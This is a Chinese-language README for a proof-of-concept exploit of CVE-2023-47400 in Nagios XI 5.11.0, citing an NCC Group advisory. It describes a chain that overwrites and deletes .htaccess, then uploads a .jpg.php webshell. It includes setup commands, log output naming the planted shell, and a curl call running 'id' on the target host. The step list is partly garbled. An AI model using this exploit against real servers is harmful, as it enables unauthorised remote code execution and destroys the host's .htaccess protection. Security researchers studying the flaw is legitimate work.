
CVE-2023-47400 的概念验证
CVE-2023-47400 的概念验证
通过任意文件写入在 Nagios XI 5.11.0 上实现已认证的 PHP 远程代码执行
[!Note] 此 PoC 基于 NCC 集团发布的技术公告 https://research.nccgroup.com/2023/12/13/technical-advisory-multiple-vulnerabilities-in-nagios-xi/
此 PoC 遵循以下过程:
placeholder.jpg 的有效图像(仅包含 JFIF 魔数头部,无内容)重命名 功能将图像重命名为 .htaccess(这会覆盖现有的 .htaccess 文件)删除 功能删除 .htaccess 文件.jpg.php 双扩展名伪装成图像签名)利用此漏洞可以在 nagiosXI 主机上实现远程代码执行,绕过文件上传过滤(通过文件签名和文件扩展名过滤)以及 PHP 执行阻止(通过 .htaccess)。
[!Warning] 此漏洞利用会擦除主机上存在的
<NAGIOS_WEB_ROOT>/includes/components/custom-includes/images/.htaccess文件,以允许 PHP 代码执行!
# 创建虚拟环境以隔离依赖
python3 -m venv .venv
source .venv/bin/activate
# 运行漏洞利用前执行 pip 安装
pip install -r requirements.txt
自定义要放置在图片上传文件夹中的 PHP 有效载荷
运行漏洞利用脚本:
python exploit.py
# 漏洞利用会生成一个 webshell 并以 UUID 作为文件名上传
[...]
INFO:cve_2023_47400:Successfuly uploaded payload at
INFO:cve_2023_47400:Usage :https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php
INFO:cve_2023_47400:Exploit completed successfuly
$ curl -k 'https://10.10.11.248/nagiosxi/includes/components/custom-includes/images/6ac234ca-8921-4e7e-a833-bf1ba03d2a3c.jpg.php?cmd=id' --output -
JFIF
uid=33(www-data) gid=33(www-data) groups=33(www-data),121(Debian-snmp),1001(nagios),1002(nagcmd)